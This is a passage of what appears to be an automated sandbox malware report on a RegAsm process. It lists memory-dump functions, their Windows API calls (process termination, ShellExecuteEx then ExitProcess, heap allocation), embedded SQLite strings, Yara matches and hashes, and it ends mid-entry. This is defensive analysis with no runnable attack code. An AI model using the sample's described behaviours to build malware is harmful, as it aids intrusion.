                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %llu$%llu$abort due to ROLLBACK$another row available$no more rows available$unknown error
                                                                                                                                                                                                                                        • API String ID: 0-1539118790
                                                                                                                                                                                                                                        • Opcode ID: f5e942746505fa782a37f31c22d6c39df65f07db4ce74290938c473f281ab3cd
                                                                                                                                                                                                                                        • Instruction ID: ada4abcaeabd37eebabdc59fea029f049ac9fff9ed5d63476bdb829a35b8bb93
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5e942746505fa782a37f31c22d6c39df65f07db4ce74290938c473f281ab3cd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F912675A053009BCB09DE28EC8479A77E1FF85325F88452DF8C99B391D736E846CB52
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid rootpage$misuse$orphan index
                                                                                                                                                                                                                                        • API String ID: 0-165706444
                                                                                                                                                                                                                                        • Opcode ID: 7f0db2335a9be52a134d6a146c3c0e02dcd34eb124d753c1f9bedc34e7986ac0
                                                                                                                                                                                                                                        • Instruction ID: 882981ffc3cd03ba936f7f20ed028f80bb7f18c33744b6cace52d22f873916cb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f0db2335a9be52a134d6a146c3c0e02dcd34eb124d753c1f9bedc34e7986ac0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F619C75A013806BEB259A70EC80F5777A9AF4221DF0E4C69FC6586AC2E721F114C7B2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: bad page number$bad page value$cannot delete$cannot insert$no such schema$read-only
                                                                                                                                                                                                                                        • API String ID: 0-1499782803
                                                                                                                                                                                                                                        • Opcode ID: 2223939b74f1d50614bcbb01171658de7ea18b40b913a28af051c022cd407923
                                                                                                                                                                                                                                        • Instruction ID: e7f300cc951aa26e35c7cf8d9d190c5db561dc0a20d2beefc782552b1d1757ea
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2223939b74f1d50614bcbb01171658de7ea18b40b913a28af051c022cd407923
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D151D376A042409BD7018B64ECC6B1677E4AFC0354F1D8469FC8A8B3F2E736E955C7A2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • API called with NULL prepared statement, xrefs: 19C7910D
                                                                                                                                                                                                                                        • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C7913E
                                                                                                                                                                                                                                        • misuse, xrefs: 19C79148
                                                                                                                                                                                                                                        • API called with finalized prepared statement, xrefs: 19C79122
                                                                                                                                                                                                                                        • %s at line %d of [%.10s], xrefs: 19C7914D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                        • API String ID: 0-860711957
                                                                                                                                                                                                                                        • Opcode ID: 09af2e758f2ad7af352ac93ef5db4b8ed90e3730c774073e465867246a73adaa
                                                                                                                                                                                                                                        • Instruction ID: c763378585d80cb78c9f81bb6ddedcf46c79a5e4c28980df0720435871c4537d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09af2e758f2ad7af352ac93ef5db4b8ed90e3730c774073e465867246a73adaa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 244179B2A443419BDB0C9E35EC45BD777E9AF81354F2C443CE4D69B382EA32E41583A2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
                                                                                                                                                                                                                                        • API String ID: 0-538076154
                                                                                                                                                                                                                                        • Opcode ID: d111e7e0b8adf36ab3069cdfd608f2e5681317a47960773997f033481c2118ea
                                                                                                                                                                                                                                        • Instruction ID: 2927a4cb1fae9f9d72f2eec3adba37927159ff35681f205db7d4047caedad71e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d111e7e0b8adf36ab3069cdfd608f2e5681317a47960773997f033481c2118ea
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E731CD75904384AFD7155A64DC00A8B7BA99F4532DF4C052CFEE562A81EB7DF501C393
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(75B65460,?,75B65460,00000000,?,0040C0A5,0040C8C0,?,0040C8C0,?,75B65460,00000000), ref: 0040BF5F
                                                                                                                                                                                                                                        • strchr.MSVCRT ref: 0040BF75
                                                                                                                                                                                                                                        • strchr.MSVCRT ref: 0040BFA6
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(75B65460,?,?,?,?,?,0040C0A5,0040C8C0,?,0040C8C0,?,75B65460,00000000), ref: 0040BFC6
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,0040C0A5,0040C8C0,?,0040C8C0,?,75B65460,00000000), ref: 0040BFD7
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040C0A5,0040C8C0,?,0040C8C0,?,75B65460,00000000), ref: 0040BFDE
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(75B65460,?,?,?,?,?,0040C0A5,0040C8C0,?,0040C8C0,?,75B65460,00000000), ref: 0040BFEE
                                                                                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0040C01A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrlen$Heapstrchr$AllocProcessstrcpy_s
                                                                                                                                                                                                                                        • String ID: 0123456789ABCDEF
                                                                                                                                                                                                                                        • API String ID: 4020929367-2554083253
                                                                                                                                                                                                                                        • Opcode ID: fd006f9b56bc7ef8a4b9ae5c8e524a07b9f310a438a39e7189a40d8a275efe6b
                                                                                                                                                                                                                                        • Instruction ID: 5966ea1f0e642e750bc4dd4ac55007b62af0bfa430af95c807717a58a61a9fb0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd006f9b56bc7ef8a4b9ae5c8e524a07b9f310a438a39e7189a40d8a275efe6b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE31B676A002059FC710DFA9DC45BAEBBB9EF8D714F40416AF919E7381D7389901CBA4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • API called with NULL prepared statement, xrefs: 19D5FB65
                                                                                                                                                                                                                                        • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D5FB96
                                                                                                                                                                                                                                        • misuse, xrefs: 19D5FBA0
                                                                                                                                                                                                                                        • API called with finalized prepared statement, xrefs: 19D5FB7A
                                                                                                                                                                                                                                        • %s at line %d of [%.10s], xrefs: 19D5FBA5
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                        • API String ID: 0-860711957
                                                                                                                                                                                                                                        • Opcode ID: 408c114430b8701d118f53c5c60f2ba114d957c1391a039c17e737a12bcb2058
                                                                                                                                                                                                                                        • Instruction ID: 32e65c1f3610dbfbc44315faf3009708cafd7d9099dff21717ffb4c76622e4c4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 408c114430b8701d118f53c5c60f2ba114d957c1391a039c17e737a12bcb2058
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69B1C2B49047419FEB108F38D845B5777F4BF44358F08496CE88B8BA81E776E4098BA2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00411AD5
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,004075E6,0040DC76), ref: 00411B06
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,004075E6,0040DC76), ref: 00411B0D
                                                                                                                                                                                                                                        • wsprintfW.USER32 ref: 00411B1C
                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00001001,00000000), ref: 00411B7D
                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B8C
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00411B93
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                                                                                                                                                                                                        • String ID: %hs
                                                                                                                                                                                                                                        • API String ID: 396451647-2783943728
                                                                                                                                                                                                                                        • Opcode ID: 2a9af94ab51f1c7612f2706503fe0e7467de995d476e1fae5c9432b40af36c71
                                                                                                                                                                                                                                        • Instruction ID: 62e53cf01b74de85e867b82ad9f5ad143882cdd6a93c6f1169250ec35743cbe0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a9af94ab51f1c7612f2706503fe0e7467de995d476e1fae5c9432b40af36c71
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD31B2B6900209ABDB10DF94DC85FEFB779EF0A700F50412AF609A7190E7385E85CBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • PRAGMA %Q.page_size, xrefs: 19CEBD03
                                                                                                                                                                                                                                        • undersize RTree blobs in "%q_node", xrefs: 19CEBDA1
                                                                                                                                                                                                                                        • SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1, xrefs: 19CEBD67
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: PRAGMA %Q.page_size$SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1$undersize RTree blobs in "%q_node"
                                                                                                                                                                                                                                        • API String ID: 0-3485589083
                                                                                                                                                                                                                                        • Opcode ID: 123aa718fcfa50f0243ef338c0588c9cdf5def841a9ab708f9a1cc783df3876c
                                                                                                                                                                                                                                        • Instruction ID: 125de7214c467d066bde2f6e857854a5580b2ab49e3db9aeb70b500da804ab17
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 123aa718fcfa50f0243ef338c0588c9cdf5def841a9ab708f9a1cc783df3876c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 38310B72E00252EFE7029B76EC84A677BA8EB44355F084125FC8A96311D735EA54CBF2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0041452E
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0041453A
                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 0041454F
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004145F1
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 004145FE
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00414610
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00414621
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: memset$lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                                        • String ID: <
                                                                                                                                                                                                                                        • API String ID: 1943017432-4251816714
                                                                                                                                                                                                                                        • Opcode ID: fa61bad28b9fa6bf749e961c07963be30b3881d2093b9f200ee653d6053f849b
                                                                                                                                                                                                                                        • Instruction ID: 40106b6c34474a18d672d20360bd6d15e979737cd144eebdb7cb1047f618d409
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa61bad28b9fa6bf749e961c07963be30b3881d2093b9f200ee653d6053f849b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E43150B1C00248EBDB04EFA5CC91EEEBBB8AF19304F50415EF20577182DB785A48CB64
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateDCA.GDI32(014532F8,00000000,00000000,00000000), ref: 00410C2A
                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00410C35
                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410C40
